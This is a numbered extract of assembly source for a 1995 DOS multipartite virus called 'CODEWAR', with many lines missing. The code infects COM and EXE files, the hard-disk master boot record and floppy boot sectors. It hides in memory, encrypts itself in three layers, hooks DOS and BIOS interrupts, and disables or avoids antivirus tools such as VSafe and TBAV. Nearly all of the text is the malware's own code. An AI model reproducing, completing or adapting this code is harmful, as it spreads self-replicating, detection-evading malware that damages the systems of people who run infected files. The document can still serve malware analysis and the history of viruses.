1 ;-------------------------------------------------------------------------
\r
13 ; C O D E W A R V i r u s
\r
16 ; Programming by Sirius & Mindmaniac
\r
68 ;---------------------------------------------------------------------------
\r
75 ; This programme introduces the technique of multipartite viruses.
\r
76 ; Pass to responsible people only!
\r
85 ; - Infection Type: - COM files,
\r
87 ; - Master Boot Record (MBR) on Hard Disk Drives
\r
88 ; - Boot Sector (BS) on Floppy Disk Drives
\r
89 ; ( 1.44 Mb + 1.2 Mb )
\r
92 ; - Encryption: 3-layer encryption (generic)
\r
94 ; - Memory resident (Bootsector virus technique)
\r
98 ; - Similarities: Alive (File Virus), Junkie (Multipartite Virus)
\r
104 ; Additional Notes:
\r
105 ; -------------------
\r
107 ; Infected objects are not detected by SSC Anti-Virus Scanner and
\r
127 ;----------------------------------------------------------------------------
\r
137 DS_File_Name db 8 dup(0)
\r
138 DS_File_Ext db 3 dup(0)
\r
140 DS_Reserved db 10 dup(0)
\r
143 DS_Start_Clust dw ?
\r
149 FCB_File_Name db 8 dup(0)
\r
150 FCB_File_Ext db 3 dup(0)
\r
156 FCB_Reserved db 8 dup(0)
\r
162 DTA_Reserved db 21 dup(0)
\r
164 DTA_File_Time1 db ? ; = seconds
\r
165 DTA_File_Time2 db ?
\r
168 DTA_File_Name db 13 dup(0)
\r
172 SFT_Reserved1 dw ? ; 0
\r
173 SFT_Open_Mode dw ? ; 2
\r
174 SFT_File_Attr db ? ; 4
\r
175 SFT_Reserved2 dw ? ; 5
\r
176 SFT_Reserved3 dd ? ; 7
\r
177 SFT_Reserved4 dw ? ; 11
\r
178 SFT_File_Time dw ? ; 13
\r
179 SFT_File_Date dw ? ; 15
\r
180 SFT_File_SizeLo dw ? ; 17
\r
181 SFT_File_SizeHi dw ? ; 19
\r
182 SFT_Curr_OfsLo dw ? ; 21
\r
183 SFT_Curr_OfsHi dw ? ; 23
\r
184 SFT_Reserved7 dw ? ; 25
\r
185 SFT_Reserved8 dd ? ; 27
\r
186 SFT_Reserved9 db ? ; 31
\r
187 SFT_File_Name db 8 dup(?) ; 32 = 20h
\r
188 SFT_File_Ext db 3 dup(?) ; 40 = 28h
\r
192 Buf_0h dw 0 ; "MZ" oder "ZM" (selten)
\r
193 Buf_2h dw 0 ; Last page size
\r
194 Buf_4h dw 0 ; Size in pages
\r
201 Buf_12h dw 0 ; CheckSum
\r
204 Buf_18h dw 0 ; WINDOWS Marker
\r
209 Flag_Exec_Infection equ 1
\r
214 Reloc = ofs Vir_Start
\r
216 Enc_Word_Length = (Virus_Length/2)+1
\r
217 Virus_Length = 4*512
\r
218 Header_Length = 18h
\r
220 File_Type_COM = byte (Restore_COM-File_Type)-2
\r
221 File_Type_EXE = byte (Restore_EXE-File_Type)-2
\r
223 Media_Descriptor_144 = 0F0h
\r
224 Media_Descriptor_120 = 0F9h
\r
226 Vir_Len_Sectors = 4
\r
228 Vir_Harddisk_Track = 0
\r
229 Vir_Harddisk_Head = 0
\r
230 Vir_Harddisk_Sector = 4
\r
232 Vir_Floppy_120_Track = 79
\r
233 Vir_Floppy_120_Head = 1
\r
234 Vir_Floppy_120_Sector = 6
\r
236 Vir_Floppy_144_Track = 79
\r
237 Vir_Floppy_144_Head = 1
\r
238 Vir_Floppy_144_Sector = 15
\r
241 Names_HDD_Track = 0
\r
243 Names_HDD_Sector = 3
\r
248 F_Min_LengthCOM = 3000
\r
249 F_Max_LengthCOM = 50000
\r
253 F_Min_LengthEXE = 6 ; = 3 kb
\r
254 F_Max_LengthEXE = 2000 ; = 1000 kb
\r
258 TOM_Decrement_value = 5
\r
262 CODE SEGMENT BYTE PUBLIC 'CODE'
\r
263 ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
\r
270 ;----------------------------------------------------------------------------
\r
271 ; always start at seg:0000
\r
274 ;----------------------------------------------------------------------------
\r
278 ;----------------------------------------------------------------------------
\r
279 ; 1st encryption layer (outer)
\r
280 ;----------------------------------------------------------------------------
\r
282 mov CX,Enc_Word_Length
\r
286 E1_Idx_Val dw ofs E1_Encrypted_Code
\r
294 XOR Word Ptr cs:[bp],ax
\r
304 jmp short E1_Dec_Loop
\r
307 ;----------------------------------------------------------------------------
\r
313 ;----------------------------------------------------------------------------
\r
314 ; 2nd encryption layer (inner)
\r
315 ;----------------------------------------------------------------------------
\r
316 mov cx,(Enc_Word_Length/2) +1
\r
320 E2_Idx_Val dw ofs E2_Encrypted_Code
\r
339 loop short E2_Dec_Loop
\r
341 ;----------------------------------------------------------------------------
\r
347 ;----------------------------------------------------------------------------
\r
348 ; 3rd encryption layer (innermost)
\r
349 ;----------------------------------------------------------------------------
\r
350 mov cx,(Enc_Word_Length/3)+1
\r
354 E3_Idx_Val dw ofs E3_Encrypted_Code
\r
383 E3_Key_Change_1 dw 0
\r
387 E3_Key_Change_2 dw 0
\r
389 loop short E3_Dec_Loop
\r
390 ;----------------------------------------------------------------------------
\r
396 ;----------------------------------------------------------------------------
\r
402 ;----------------------------------------------------------------------------
\r
406 ;----------------------------------------------------------------------------
\r
407 ; Restore program-header, the registers and go back to the program
\r
413 db 0EBh ; JMP-short-opcode
\r
414 File_Type db File_Type_COM
\r
415 ;----------------------------------------------------------------------------
\r
418 ;----------------------------------------------------------------------------
\r
419 ; restore the COM-host-file
\r
425 MOV Word Ptr cs:[DI],1234h
\r
429 MOV byte Ptr cs:[DI+2],12h
\r
440 ;----------------------------------------------------------------------------
\r
443 ;----------------------------------------------------------------------------
\r
444 ; restore the EXE-host-file
\r
447 mov ax,ds ; DS = PSP !
\r
448 add ax,10h ; + 100h bytes of PSP
\r
449 add cs:[bx+ofs Old_CS -Reloc],ax ; = new CS
\r
450 add ax,0000 ; + old SS
\r
455 mov sp,0000 ; set SP
\r
460 call ZeroRegsForHost
\r
462 db 0EAh ; = JMP Old_CS:Old_IP
\r
464 ; In an EXE - header-values are stored here
\r
469 ;----------------------------------------------------------------------------
\r
472 db " PSYCHo-TECH GMBH 1995 "
\r
474 ;----------------------------------------------------------------------------
\r
483 dw ofs Delta -Reloc
\r
493 ; prepare the retf to Exit_File
\r
496 lea ax,cs:[bx+ofs Exit_File -Reloc]
\r
499 ; change CS, so we start at ofs 0 not 100h
\r
505 MOV AX,ofs Continue -Reloc
\r
508 ;----------------------------------------------------------------------------
\r
512 ;----------------------------------------------------------------------------
\r
521 mov word ptr ds:[(79*2)],00cf9h ;= lightred point "ù"
\r
525 ;----------------------------------------------------------------------------
\r
529 ;----------------------------------------------------------------------------
\r
539 ; decrement RAM by xx kB
\r
541 SUB Word Ptr DS:[0413h],TOM_Decrement_value
\r
547 ; move virus to TOM (xxxx bytes)
\r
549 MOV CX,Virus_Length
\r
553 ; set new INT 13h and 1Ch
\r
558 MOV DI,ofs Old_Int_13 -Reloc
\r
559 MOV AX,ofs New_Int_13 -Reloc
\r
562 MOV Byte Ptr ES:[ofs Got_Int_21 -Reloc],0
\r
565 MOV DI,ofs Old_Int_1c -Reloc
\r
566 MOV AX,ofs New_Int_1c -Reloc
\r
573 MOV DI,ofs Old_Int_21 -Reloc
\r
580 ; prepare RETF to orig PAR/BS
\r
586 push ofs Boot_Finish -Reloc
\r
591 ; restore the JUMP-Word and the patched PAR/BS
\r
593 MOV SI,7c00h + 512 + BS_First_word -Reloc
\r
596 mov di,7c00h + 60h ; offset of the patch-area
\r
599 ; Patch the TBAV immunized partition
\r
601 cmp w cs:[7c00h+0dfh],"hT"
\r
602 jne no_TB_partition
\r
603 mov b cs:[7c00h+73h],0
\r
607 ; goto Boot_Finish / infect C:
\r
610 ;----------------------------------------------------------------------------
\r
613 ;----------------------------------------------------------------------------
\r
616 cmp ax,0201h ; reading ?
\r
617 JNZ Jump_Old_Int_13
\r
619 CMP CX,0001h ; sector 1 and Track 0 ?
\r
620 JNZ Jump_Old_Int_13
\r
622 or dh,dh ; head 0 ?
\r
623 jnz Jump_Old_Int_13
\r
636 jmp dword ptr cs:(ofs Old_Int_13 -Reloc)
\r
638 ;----------------------------------------------------------------------------
\r
642 ;----------------------------------------------------------------------------
\r
645 call dword ptr cs:(ofs Old_Int_13 -Reloc)
\r
647 ;----------------------------------------------------------------------------
\r
650 db " >>> BRAVEd DANGER 4 BRAVE PEOPLe <<< "
\r
653 ;----------------------------------------------------------------------------
\r
666 MOV DI,ofs Old_Int_13 -Reloc
\r
671 JMP Short Read_Drive_C
\r
672 ;----------------------------------------------------------------------------
\r
675 ;----------------------------------------------------------------------------
\r
679 ;----------------------------------------------------------------------------
\r
682 ;----------------------------------------------------------------------------
\r
687 CALL Int13_Works ; infect drive C
\r
695 ;----------------------------------------------------------------------------
\r
698 ;----------------------------------------------------------------------------
\r
706 CALL Read_or_Write_BS_from_A
\r
712 MOV DI,ofs Buffer + 60h -Reloc
\r
714 ; check if BS is infected
\r
716 CMP Word Ptr [SI],05EEBh ; SI=@buffer
\r
717 JNZ BS_not_infected
\r
719 CMP Word Ptr [DI],0FF33h ; == xor di,di
\r
724 ; test if it is Harddisk or floppy
\r
730 ; test if HD 1.44 (=F0) or HD 1.2 (=F9) floppy
\r
732 CMP Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_144
\r
735 CMP Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_120
\r
739 MOV CL,Vir_Floppy_120_Sector
\r
740 JMP Short Floppy_Disk
\r
741 ;----------------------------------------------------------------------------
\r
744 ;----------------------------------------------------------------------------
\r
745 ; 1.44 floppy found
\r
751 ; 0:490h == AT Drive 0 status
\r
753 CMP Byte Ptr DS:[0090h],97h
\r
758 MOV CL,Vir_Floppy_144_Sector
\r
764 MOV CH,Vir_Floppy_120_Track
\r
766 ;----------------------------------------------------------------------------
\r
769 ;----------------------------------------------------------------------------
\r
771 MOV CX,Vir_Harddisk_Sector
\r
773 ;----------------------------------------------------------------------------
\r
776 ;----------------------------------------------------------------------------
\r
778 MOV DH,Vir_Floppy_120_Head
\r
780 MOV DS:[ofs Ptc_CX -Reloc],CX ; patch the PAR
\r
781 MOV DS:[ofs Ptc_DX -Reloc],DX
\r
788 ; Move the JMP-Op to the beginning of BS/PAR
\r
790 MOV DI,ofs BS_first_word -Reloc ; SI=ofs buffer
\r
807 CALL Read_or_Write_BS_from_A
\r
813 MOV AL,Vir_Len_Sectors
\r
814 MOV BX,ofs Buffer -Reloc
\r
818 MOV Word Ptr DS:[ofs E1_Idx_Val -Reloc],7c00h +512+E1_Encrypted_Code -Reloc -Camouf
\r
819 MOV Word Ptr DS:[ofs E2_Idx_Val -Reloc],7c00h +512+E2_Encrypted_Code -Reloc
\r
820 MOV Word Ptr DS:[ofs E3_Idx_Val -Reloc],7c00h +512+E3_Encrypted_Code -Reloc
\r
825 CALL Call_Old_Int_13
\r
828 ;----------------------------------------------------------------------------
\r
831 ;----------------------------------------------------------------------------
\r
832 ; read the PAR/BS from drive
\r
833 ;----------------------------------------------------------------------------
\r
835 Read_or_Write_BS_from_A:
\r
839 MOV BX,ofs Buffer -Reloc
\r
843 CALL Call_Old_Int_13
\r
847 ;----------------------------------------------------------------------------
\r
850 ;----------------------------------------------------------------------------
\r
856 ;----------------------------------------------------------------------------
\r
859 ;----------------------------------------------------------------------------
\r
869 ;----------------------------------------------------------------------------
\r
873 ;----------------------------------------------------------------------------
\r
895 ;----------------------------------------------------------------------------
\r
899 ;============================================================================
\r
905 ; get (random) key-values
\r
909 MOV word ptr cs:[ofs E1_Key_Val -Reloc],ax
\r
913 MOV word ptr cs:[ofs E2_Key_Val_1 -Reloc],ax
\r
916 MOV word ptr cs:[ofs E2_Key_Val_2 -Reloc],ax
\r
920 MOV word ptr cs:[ofs E3_Key_Val_1 -Reloc],ax
\r
923 MOV word ptr cs:[ofs E3_Key_Val_2 -Reloc],ax
\r
926 MOV word ptr cs:[ofs E3_Key_Val_3 -Reloc],ax
\r
929 MOV word ptr cs:[ofs E3_Key_Change_1 -Reloc],ax
\r
932 MOV word ptr cs:[ofs E3_Key_Change_2 -Reloc],ax
\r
944 MOV DI,ofs Buffer -Reloc
\r
945 MOV CX,(ofs Encrypted_Code_End - ofs Vir_Start)
\r
961 ;----------------------------------------------------------------------------
\r
962 ; encrypt innermost layer E3
\r
964 MOV w ax,cs:[ofs E3_Key_Val_1 -Reloc]
\r
965 MOV w bx,cs:[ofs E3_Key_Val_2 -Reloc]
\r
966 MOV w dx,cs:[ofs E3_Key_Val_3 -Reloc]
\r
969 MOV w di,cs:[ofs E3_Key_Change_1 -Reloc]
\r
970 MOV w bp,cs:[ofs E3_Key_Change_2 -Reloc]
\r
972 MOV si,ofs Buffer -Reloc
\r
973 ADD si,ofs E3_Encrypted_Code -Reloc
\r
975 MOV CX,(Enc_Word_Length/3) +1
\r
995 ;----------------------------------------------------------------------------
\r
999 ;----------------------------------------------------------------------------
\r
1000 ; encrypt inner layer E2
\r
1002 MOV w ax,cs:[ofs E2_Key_Val_1 -Reloc]
\r
1003 MOV w bx,cs:[ofs E2_Key_Val_2 -Reloc]
\r
1005 MOV si,ofs Buffer -Reloc
\r
1006 ADD si,ofs E2_Encrypted_Code -Reloc
\r
1008 MOV CX,(Enc_Word_Length/2) +1
\r
1020 ;----------------------------------------------------------------------------
\r
1024 ;----------------------------------------------------------------------------
\r
1025 ; encrypt outer layer E1
\r
1027 MOV word ptr bx,cs:[ofs E1_Key_Val -Reloc]
\r
1029 MOV DI,ofs Buffer -Reloc
\r
1030 ADD DI,ofs E1_Encrypted_Code -Reloc
\r
1032 MOV CX,Enc_Word_Length
\r
1039 ;----------------------------------------------------------------------------
\r
1047 ;============================================================================
\r
1051 ;----------------------------------------------------------------------------
\r
1053 CMP Byte Ptr CS:[ofs Got_Int_21 -Reloc],1
\r
1063 ; load int 20h seg and compare if below 800h
\r
1065 MOV AX,DS:[4*20h +2]
\r
1073 ; cmp with int 21h seg
\r
1078 ; cmp with int 27h seg
\r
1080 CMP DS:[4*27h +2],AX
\r
1083 ; cmp with int 2Fh seg
\r
1085 CMP DS:[4*2Fh +2],AX
\r
1088 ; ok, now hook int 21h
\r
1091 MOV DI,ofs Old_Int_21 -Reloc
\r
1094 MOV AX,ofs New_Int_21 -Reloc
\r
1097 ; set the flag for it
\r
1098 MOV Byte Ptr CS:[ofs Got_Int_21 -Reloc],01h
\r
1101 ; get int 2f vector
\r
1105 mov w ax,ds:[4*2fh]
\r
1106 mov w cs:[ofs Old_Int_2f -Reloc],ax
\r
1107 mov w ax,ds:[4*2fh+2]
\r
1108 mov w cs:[ofs Old_Int_2f -Reloc+2],ax
\r
1118 jmp dword ptr cs:(ofs Old_int_1c -Reloc)
\r
1119 ;----------------------------------------------------------------------------
\r
1123 ;----------------------------------------------------------------------------
\r
1127 IF Flag_Exec_Infection
\r
1129 JZ Control_Operation
\r
1134 JZ Control_Operation
\r
1137 jmp dword ptr cs:(ofs Old_Int_21 -Reloc)
\r
1138 ;----------------------------------------------------------------------------
\r
1141 ;----------------------------------------------------------------------------
\r
1142 Control_Operation:
\r
1151 call Deinstall_Vsafe
\r
1158 MOV Word Ptr DS:[4*24h], ofs New_Int_24 -Reloc
\r
1159 MOV DS:[4*24h +2],CS
\r
1168 call Call_Old_Int21
\r
1180 call Call_Old_Int2F ; INT 2Fh
\r
1184 call Call_Old_Int2F ; INT 2Fh
\r
1189 ; skip AV-programs ?
\r
1191 call Check_If_AV_Name
\r
1192 jz goto_close_exit
\r
1195 ; test if executable-file
\r
1197 CMP Word Ptr ES:[DI+28h],"OC"
\r
1200 CMP Word Ptr ES:[DI+28h],"XE"
\r
1204 JMP Short Close_Exit
\r
1205 ;----------------------------------------------------------------------------
\r
1209 ;----------------------------------------------------------------------------
\r
1213 ; Check if infected
\r
1214 mov ax,es:[di.SFT_File_Time]
\r
1222 ; save date/time
\r
1223 mov ax,es:[di.SFT_File_Time]
\r
1224 mov cs:[ofs Old_Time -Reloc],ax
\r
1225 mov ax,es:[di.SFT_File_Date]
\r
1226 mov cs:[ofs Old_Date -Reloc],ax
\r
1228 ; Get file length directly from the SFT and save it
\r
1229 mov ax,es:[di+SFT_File_SizeLo]
\r
1230 mov cs:[ofs File_SizeLo -Reloc], ax
\r
1231 mov ax,es:[di.SFT_File_SizeHi]
\r
1232 mov cs:[ofs File_SizeHi -Reloc], ax
\r
1234 ; Force read/write mode
\r
1235 mov word ptr es:[di.SFT_Open_Mode],2
\r
1257 MOV DS:[4*24h +2],ES
\r
1264 ;----------------------------------------------------------------------------
\r
1268 ;----------------------------------------------------------------------------
\r
1271 ;----------------------------------------------------------------------------
\r
1275 ;----------------------------------------------------------------------------
\r
1277 mov byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE
\r
1280 mov word ptr cs:[ofs Handle -Reloc],bx
\r
1282 ; Don't infect too big/small EXE-files!
\r
1283 mov word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc] ; EXE size in 512 byte pages
\r
1284 cmp AX,F_Min_LengthEXE ; Don't infect files less than xxxx pages
\r
1285 JB goto_Infect_Ret
\r
1286 cmp AX,F_Max_LengthEXE ; Or bigger than xxxx pages
\r
1287 JA goto_Infect_Ret
\r
1297 ; It's OK! Process it now !
\r
1298 les ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc] ;Entry_Point_Disp
\r
1299 mov cs:[ofs Old_IP -Reloc],ax
\r
1300 mov cs:[ofs Old_CS -Reloc],es
\r
1302 les ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc] ;Stack_Disp
\r
1303 mov cs:[ofs Old_SS -Reloc],ax
\r
1304 mov cs:[ofs Old_SP -Reloc],es
\r
1306 mov ax,cs:[ofs File_Buffer.Buf_8h -Reloc] ; = Header size in paras
\r
1308 shl ax,cl ; Convert to byte-format
\r
1310 ; Get file size from SFT
\r
1311 push ax ; Save header size
\r
1312 mov ax,cs:[ofs File_SizeLo -Reloc]
\r
1313 mov dx,cs:[ofs File_SizeHi -Reloc]
\r
1315 ; add the padding-number
\r
1316 mov cx,cs:[ofs File_SizeLo -Reloc]
\r
1323 ; save the padding-number
\r
1324 mov cs:[ofs Padded -reloc],cx
\r
1326 pop bx ; = Header size
\r
1328 sub ax,bx ; DX:AX := file size - header size
\r
1331 mov cx,16 ; Convert to seg:ofs format
\r
1333 div cx ; DX:AX := (DX:AX) / 10h
\r
1339 mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP
\r
1340 mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS
\r
1342 inc word ptr cs:[ofs File_Buffer.Buf_16h -Reloc] ; CS
\r
1346 mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP
\r
1347 mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS
\r
1350 inc ax ; Avoid the "K" TB-flag (seems unecessary)
\r
1351 mov word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax ; New SS
\r
1352 mov word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0 ; New SP
\r
1354 mov ax,cs:[ofs File_SizeLo -Reloc]
\r
1355 mov dx,cs:[ofs File_SizeHi -Reloc]
\r
1357 ; add the padding-number
\r
1358 add ax,cs:[ofs Padded -reloc]
\r
1362 add ax,Virus_Length ; Lo-word
\r
1363 adc dx,0 ; Hi-word
\r
1372 and ah,1 ; Mod 512
\r
1373 mov cs:[ofs File_Buffer.Buf_4h -Reloc],dx ; Size in pages (rounded up)
\r
1374 mov cs:[ofs File_Buffer.Buf_2h -Reloc],ax ; Size of last page (in bytes)
\r
1380 mov word ptr bx,cs:[ofs Handle -Reloc]
\r
1381 mov ax,cs:[ofs File_SizeLo -Reloc]
\r
1385 ; Construct index for decryptor
\r
1389 MOV word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf
\r
1390 MOV word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)
\r
1391 MOV word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)
\r
1397 ;----------------------------------------------------------------------------
\r
1401 ;----------------------------------------------------------------------------
\r
1409 MOV CX,Header_Length
\r
1410 MOV DX,ofs File_buffer -Reloc
\r
1416 cmp word ptr cs:[ofs File_buffer -Reloc],"ZM"
\r
1420 ;----------------------------------------------------------------------------
\r
1423 mov byte ptr cs:[ofs File_Type -Reloc],File_Type_COM
\r
1432 MOV ax,word ptr DS:[File_buffer -Reloc]
\r
1433 MOV DS:[ofs Rest1 -Reloc],ax
\r
1434 MOV al,byte ptr DS:[File_buffer -Reloc +2]
\r
1435 MOV DS:[ofs Rest2 -Reloc],al
\r
1439 ; file smaller than xxxx bytes ?
\r
1441 CMP AX,F_Min_LengthCOM
\r
1444 ; file larger than xxxx bytes ?
\r
1446 CMP AX,F_Max_LengthCOM
\r
1453 ; Construct index for decryptor
\r
1458 ADD AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf
\r
1459 MOV DS:[ofs E1_Idx_Val -Reloc],AX
\r
1465 ADD AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)
\r
1466 MOV DS:[ofs E2_Idx_Val -Reloc],AX
\r
1472 ADD AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)
\r
1473 MOV DS:[ofs E3_Idx_Val -Reloc],AX
\r
1478 ; construct and insert a JUMP-INSTR.
\r
1480 MOV byte ptr DS:[File_buffer -Reloc],0E9h
\r
1482 MOV word ptr DS:[File_buffer+1 -Reloc],AX
\r
1483 ;----------------------------------------------------------------------------
\r
1487 ;----------------------------------------------------------------------------
\r
1490 ; write body at EOF
\r
1493 MOV CX,Virus_Length
\r
1494 MOV DX,ofs Buffer -Reloc
\r
1495 CALL Encrypt_Virus
\r
1499 ; write JUMP to TOF
\r
1505 MOV CX,Header_Length
\r
1506 MOV DX,ofs File_buffer -Reloc
\r
1509 ; restore time stamps
\r
1512 mov cx,cs:[ofs Old_Time -Reloc]
\r
1513 mov dx,cs:[ofs Old_Date -Reloc]
\r
1515 or cl,Time_Stamp ; Mark with Time-ID
\r
1520 ;----------------------------------------------------------------------------
\r
1524 ;----------------------------------------------------------------------------
\r
1536 ;----------------------------------------------------------------------------
\r
1540 ;----------------------------------------------------------------------------
\r
1552 ;----------------------------------------------------------------------------
\r
1556 ;----------------------------------------------------------------------------
\r
1557 Check_If_AV_Name proc near
\r
1558 cmp byte ptr es:[di.SFT_File_Name],"L"
\r
1560 cmp byte ptr es:[di.SFT_File_Name],"-"
\r
1562 cmp word ptr es:[di.SFT_File_Name],"BT"
\r
1564 cmp word ptr es:[di.SFT_File_Name],"CS"
\r
1566 cmp word ptr es:[di.SFT_File_Name],"-F"
\r
1568 cmp word ptr es:[di.SFT_File_Name],"IV"
\r
1572 Check_If_AV_Name endp
\r
1573 ;----------------------------------------------------------------------------
\r
1578 ;----------------------------------------------------------------------------
\r
1588 ;----------------------------------------------------------------------------
\r
1591 ;----------------------------------------------------------------------------
\r
1592 Call_Old_Int21 PROC NEAR
\r
1594 call dword ptr cs:(ofs Old_Int_21 -Reloc)
\r
1596 Call_Old_Int21 ENDP
\r
1597 ;----------------------------------------------------------------------------
\r
1600 ;----------------------------------------------------------------------------
\r
1601 Call_Old_Int2F PROC NEAR
\r
1603 call dword ptr cs:(ofs Old_Int_2F -Reloc)
\r
1605 Call_Old_Int2F ENDP
\r
1606 ;----------------------------------------------------------------------------
\r
1610 ;----------------------------------------------------------------------------
\r
1614 ;----------------------------------------------------------------------------
\r
1617 ;----------------------------------------------------------------------------
\r
1629 ; If Int 21h already captured then 1 else 0
\r
1636 ;----------------------------------------------------------------------------
\r
1641 ;----------------------------------------------------------------------------
\r
1642 BS_first_word dw 0
\r
1643 Old_BS_code db 32 dup ('B')
\r
1644 ;----------------------------------------------------------------------------
\r
1647 ;----------------------------------------------------------------------------
\r
1648 ; The first word of the PAR/BS is stored here
\r
1652 ;----------------------------------------------------------------------------
\r
1655 ;----------------------------------------------------------------------------
\r
1665 ; read xx sectors to 7e00h
\r
1668 MOV AX,0204h ; !!!!!! Sectors !!!!!!
\r
1684 ; Jump to the reload code from 2 sectors
\r
1685 ; The offset in the BS/PAR where this instruction is executed is at
\r
1686 ; BS/PAR:60h+($-Start_Jboot)
\r
1688 jmp $ + 512 - ($-Start_Jboot+60h) ;+512 -125
\r
1689 ;----------------------------------------------------------------------------
\r
1694 ;----------------------------------------------------------------------------
\r
1695 db " [[ Cú0úDúEúWúAúR ]] <32> Germany 1995 "
\r
1696 db "Virtually called to life & survival by"
\r
1698 db "RGOEPMSQO & NJOENBOJBD"
\r
1700 db " ==>= AllE GUtEN DiNGE SiND DREi ==>= "
\r
1703 ;----------------------------------------------------------------------------
\r
1706 Encrypted_Code_End equ $
\r
1709 ;----------------------------------------------------------------------------
\r
1711 db Header_Length dup ('H')
\r
1712 ;----------------------------------------------------------------------------
\r
1715 ;----------------------------------------------------------------------------
\r
1716 ; here is the virus copied and encrypted
\r
1718 ;----------------------------------------------------------------------------
\r